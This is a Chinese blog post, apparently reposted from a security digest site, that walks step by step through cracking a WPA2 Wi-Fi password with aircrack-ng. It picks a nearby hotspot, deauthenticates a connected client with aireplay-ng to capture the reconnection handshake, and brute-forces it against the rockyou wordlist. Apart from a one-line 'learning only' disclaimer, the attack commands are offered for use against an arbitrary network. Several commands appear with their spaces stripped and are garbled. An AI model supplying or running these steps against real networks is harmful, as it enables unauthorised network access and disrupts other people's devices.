首页 安全文摘 正文

破解Wi-Fi硬操作

0x01 过程思路kali系统接入无线网卡,通过监听周围热点,选择一个Wi-Fi热点,攻击一台连接了该Wi-Fi热点的设备,使它掉线之后这台设备会再次主动连接,用伪装的挂载设备去接收设备发送的tcp三次握手数据包,只要用kali自带的密码字典文件去穷举该数据包,直到找到Wi-Fi密码为止0x02 详细过程先将无线网卡插入Kali Linux,输入命令查看,网

破解Wi Fi硬操作 安全文摘 安全文摘  第1张

0x01 过程思路

kali系统接入无线网卡,通过监听周围热点,选择一个Wi-Fi热点,攻击一台连接了该Wi-Fi热点的设备,使它掉线之后这台设备会再次主动连接,用伪装的挂载设备去接收设备发送的tcp三次握手数据包,只要用kali自带的密码字典文件去穷举该数据包,直到找到Wi-Fi密码为止

破解Wi Fi硬操作 安全文摘 安全文摘  第2张

0x02 详细过程

先将无线网卡插入Kali Linux,输入命令查看,网卡名一般为wlan0

iwconfig

破解Wi Fi硬操作 安全文摘 安全文摘  第3张

将可能会影响进行无线实验的因素排除掉

service network-manager stop
airmon-ngcheckkill

破解Wi Fi硬操作 安全文摘 安全文摘  第4张

接着启动monitor模式开启网卡监听

airmon-ngstartwlan0

破解Wi Fi硬操作 安全文摘 安全文摘  第5张

输入iwconfig命令确认已经进入monitor模式

破解Wi Fi硬操作 安全文摘 安全文摘  第6张

扫描wifi信号,数据包抓取

airodump-ng wlan0mon

破解Wi Fi硬操作 安全文摘 安全文摘  第7张

BSSID:AP端MAC地址

PWR:信号强度,数字越⼩小越好

Data:对应路由器的在线数据吞吐量,数字越⼤数据上传量越⼤

CH:对应路由器所在频道

ESSID:对应路由器名称

选择一个WiFi(在此我选择MAC为70:47:E9:64:9A:CF,路由器名为“嘿嘿嘿”)针对某一个WiFi的BSSID进行抓取

airodump-ng -c <AP的频道> -w <抓取握⼿手包的存放位置> --bssid <AP的MAC地址> < monitor名称>

airodump-ngwlan0mon--bssid70:47:E9:64:9A:CF-c11-wwpa2

抓取 ssid 为70:47:E9:64:9A:CF信道为11的wpa2的数据包

破解Wi Fi硬操作 安全文摘 安全文摘  第8张

现在还抓不到握手包,因为没有客户端与AP进行连接

但是有一个已连接的热点,我们通过新开一个终端窗口,解除认证发送反认证包,让它下线,然后客户端会重新尝试连接热点


aireplay-ng -0 <发送反认证包的个数> -a <BSSID> -c <强制下线的MAC地址> 无线网卡名称

aireplay-ng-010-a70:47:E9:64:9A:CF-c34:F6:4B:AC:E6:F8wlan0mon

破解Wi Fi硬操作 安全文摘 安全文摘  第9张

系统会下线重新连接,我们就抓到了握手包,我们返回第一个终端就可以看到已经抓到握手包WPA handshake

破解Wi Fi硬操作 安全文摘 安全文摘  第10张

选择需要破解的数据包和字典(kali自带一个字典文件,虽然不大,也可以通过其他的字典生成工具生成)

解压kali自带的字典文件

路径:/usr/share/wordlists/rockyou.txt.gz

gzip -d/usr/share/wordlists/rockyou.txt.gz

查看一下文件

破解Wi Fi硬操作 安全文摘 安全文摘  第11张

破解Wi Fi硬操作 安全文摘 安全文摘  第12张

开始爆破

aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa2-10.cap

破解Wi Fi硬操作 安全文摘 安全文摘  第13张

此文章仅用于学习,不可用于非法用途

海报

本文转载自互联网,如有侵权,联系删除

转载请注明本文地址:https://heibai.org.cn/1632.html

相关推荐

从偶遇Flarum开始的RCE之旅

从偶遇Flarum开始的RCE之旅

事先声明:本次测试过程完全处于本地或授权环境,仅供学习与参考,不存在未授权测试过程,请读者勿使用该漏洞进行未授权测试,否则作者不承担任何...

WEB安全 2022-08-21 0 10258

2022年蓝队初级护网总结

2022年蓝队初级护网总结

一. 设备误报如何处理? 答:来自外网的误报说明安全设备需要进行策略升级,不需要处置。如果是来自内网的误报可以和负责人协商一下...

安全文摘 2022-08-21 0 10100

发布评论

ainiaobaibaibaibaobaobeishangbishibizuichiguachijingchongjingdahaqiandaliandangaodw_dogedw_erhadw_miaodw_tuzidw_xiongmaodw_zhutouganbeigeiliguiguolaiguzhanghahahahashoushihaixiuhanheixianhenghorse2huaixiaohuatonghuaxinhufenjiayoujiyankeaikeliankouzhaokukuloukunkuxiaolandelinileimuliwulxhainiolxhlikelxhqiuguanzhulxhtouxiaolxhwahahalxhzanningwennonuokpinganqianqiaoqinqinquantouruoshayanshengbingshiwangshuaishuijiaosikaostar0star2star3taikaixintanshoutianpingtouxiaotuwabiweifengweiquweiwuweixiaowenhaowoshouwuxiangjixianhuaxiaoerbuyuxiaokuxiaoxinxinxinxinsuixixixuyeyinxianyinyueyouhenghengyuebingyueliangyunzanzhajizhongguozanzhoumazhuakuangzuohenghengzuoyi
感谢您的支持